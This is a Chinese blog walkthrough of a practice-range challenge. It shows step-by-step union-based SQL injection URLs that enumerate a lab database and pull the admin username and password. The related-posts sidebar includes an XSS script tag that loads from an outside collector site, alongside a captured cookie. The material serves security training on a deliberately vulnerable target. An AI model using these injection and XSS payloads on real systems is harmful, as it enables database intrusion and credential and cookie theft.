封神台第一章:为了女神小芳

最新推荐文章于 2024-03-21 21:29:45 发布
最新推荐文章于 2024-03-21 21:29:45 发布
阅读量490 收藏 2
点赞数 1
分类专栏: 渗透测试实验 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51459600/article/details/122080317
版权

实验平台:封神台-掌控安全在线演练靶场

第一章:为了女神小芳!

传送门:http://rhiq8003.ia.aqlab.cn/

实验目标:获取admin的密码

点击查看新闻1,跳转到http://rhiq8003.ia.aqlab.cn/?id=1

发现传递的参数名为id
 

判断有无注入点

http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2

未显示出新闻内容,说明存在注入点

 

判断查询字段数

http://rhiq8003.ia.aqlab.cn/?id=1 order by 2

显示新闻内容

http://rhiq8003.ia.aqlab.cn/?id=1 order by 3

未显示新闻内容

说明共有两个查询字段

 

查看显示位置

将id值设置为不存在的数,利用union查询

http://rhiq8003.ia.aqlab.cn/?id=60000 union select 1, 2

可以看到有一个回显的位置

 

查看数据库名,版本,用户名

http://rhiq8003.ia.aqlab.cn/?id=60000 union select 1,database()

http://rhiq8003.ia.aqlab.cn/?id=60000 union select 1,version()

http://rhiq8003.ia.aqlab.cn/?id=60000 union select 1,user()

 

爆数据库表名

http://rhiq8003.ia.aqlab.cn/?id=60000 union select 1,group_concat(table_name) from information_schema.tables where table_schema='maoshe'

 

爆admin表中的字段名

http://rhiq8003.ia.aqlab.cn/?id=60000 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'

 

查詢admin表中的username,password

http://rhiq8003.ia.aqlab.cn/?id=60000 union select 1,group_concat(username) from admin

http://rhiq8003.ia.aqlab.cn/?id=60000 union select 1,group_concat(password) from admin

可以看到用户admin的密码为hellohack

提交flag结束此题

Hummer-200
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
神台sql注入---第一章节: 为了女神小芳
qq_52573109的博客
09-14 775
1:靶场链接: https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7https://hack.zkaq.cn/battle/target?id=485e58d0afa7e4f7 2:解题过程: (1):打开传送门,点击"点击查看新闻"发现url出现参数 id = 1,猜测为注入点。 (2):判断字段个数: 注入代码: order by 2 ...
神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】
红凳子的博客
05-07 1963
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】前言判断是否存在SQL注入漏洞二、使用步骤1.引入库2.读入数据总结 前言 提示:通过sql注入拿到管理员密码! 尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站,学过一点黑客技术的他,想在女神面前炫炫技。于是他打开了传送门 判断是否存在SQL注入漏洞 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二
神台——尤里的复仇Ⅰ 小芳
最新发布
ASD830的博客
03-21 341
我们可以查出“admin“”表里 有 “id” “username” “password” 三个字段。题目说让我们拿到管理员账户的密码,我们看一下username和password字段的内容。尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站。根据提示我们需要浅浅的sql注入一下,首先判断一下是否存在SQL注入漏洞。学过一点黑客技术的他,想在女神面前炫炫技。页面不正常,说明存在SQL注入漏洞。页面出现了2,说明我们的回显位为2。页面不正常,判断出字段数为2。
注入(一)
tomyyyyy
06-28 270
eg: 例子 第一步,判断是否存在sql注入漏洞 构造 ?id=1 and 1=1 ,回车 页面返回正常 构造 ?id=1 and 1=2 ,回车 页面不正常,初步判断这里 可能 存在一个注入漏洞 第二步:判断字段数 构造 ?id=1 and 1=1 order by 1 回车 页面正常 构造 ?id=1 and 1=1 order by 2 回车 页面正常 构造 ?id=1 and 1=1 o...
神台在线靶场——第一章:为了女神小芳!
pigzlfa的博客
10-10 255
sql注入基础版。
神台----尤里的复仇I-第一章:为了女神小芳
正在学习的路上...
07-17 2989
1.找注入点 ?id=1 and 1=1 ------ 显示正常 ?id=1 and 1=2 ------ 不显示 2.猜列数、报显示位 ?id=1 order by 2 ------查询了两列 ?id=466454 select 1,2 ------将id设为一个不存在的数...
第一章:为了女神小芳
m0_59205095的博客
05-16 2213
第一章:为了女神小芳 通过sql注入拿到管理员密码!尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站 学过一点黑客技术的他,想在女神面前炫炫技。于是他打开了 宠物猫 异国短毛猫 纯种猫 加菲猫 波斯猫 辛巴猫舍 纯种双色/梵文波斯、异国小猫 CFA注册猫舍 (aqlab.cn) 实验工具 sqlmap 实验环境 kali 1.判断是否存在注入点,页面显示如图所示可能存在sql注入点 http://rhiq8003.ia.aqlab.cn/?id=1and%
神台靶场-第一章
Mr_helloword的博客
07-12 2715
第一章:为了女神小芳! Tips: 通过sql注入拿到管理员密码! 寻找注入点,判断是什么注入 |?id=1 and 1=1| 显示正常 | |-|–| | ?id=1and 1=2| 页面有变故(存在注入) | |?id=1’ | 页面有回显但是无法判断注入类型| ||| 查看列数及字段数(这里通过二分法可以快速定位列数为2) 联合查询(注意前面id为假才会执行后门的联合查询) |?id=121 union select 1,2 #| 查看回显位置 | |–|--| |?id=1
神台——第一题:为了女神小芳
分享简单的安全技术
01-17 685
题目:获取数据库管理员密码 题目传送阵 渗透步骤        第一步:点击“点击查看新闻”超链接,跳转到一个页面,url发生改变,设想这个页面存在sql漏洞。        第二步:输入sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch,使用sqlmap对该页面进行扫描,看该页面是否存在漏洞,从结果得知可以从基
神台-杂项8:奇怪的短信
03-11
随波逐流工具,一个非常好用的解码工具
登录别人的账户(仅在神台靶场).mp4
04-07
这个教程仅在神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
-:unity开发的FC神榜复刻版
02-13
-- unity开发的FC神榜复刻版
leetcode:Leetcode神之路
02-09
Golang的Leetcode解决方案
更改支付金额(仅在神台靶场).mp4
04-07
这个教程仅在神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳!一二三四五六七章
热门推荐
algae
08-14 3万+
神台 - 掌控安全靶场】尤里的复仇 小芳!第五章:进击!拿到Web最高权限!【配套课时:绕过防护上传木马实战演练】(等级:15) <script src = https://xsspt.com/nxqPZY?1597410463> </ script> cookie : ASPSESSIONIDSQDARATQ=KJFAFKEDEAPPFBEDHJFCIGIC; flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNP
神台靶场 第一章:为了女神小芳 (SQL注入)
m0_65712192的博客
10-14 1549
神台靶场 第一章:为了女神小芳 (SQL注入)
神台-靶场-第一章:为了女神小芳!(题解)+ 中北网安实训笔记-(20200701)-sql注入基本语法
tonyhapply的博客
07-18 1528
我们先来学习sql注入,
c4d修神记:零基础到三维神 下载
01-05
"c4d修神记:零基础到三维神"是一本关于学习Cinema 4D(简称C4D)软件的书籍。C4D是一款强大的三维建模、动画和渲染软件,广泛应用于电影、游戏、广告等领域。该书以零基础的读者为目标群体,旨在通过系统的教程和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值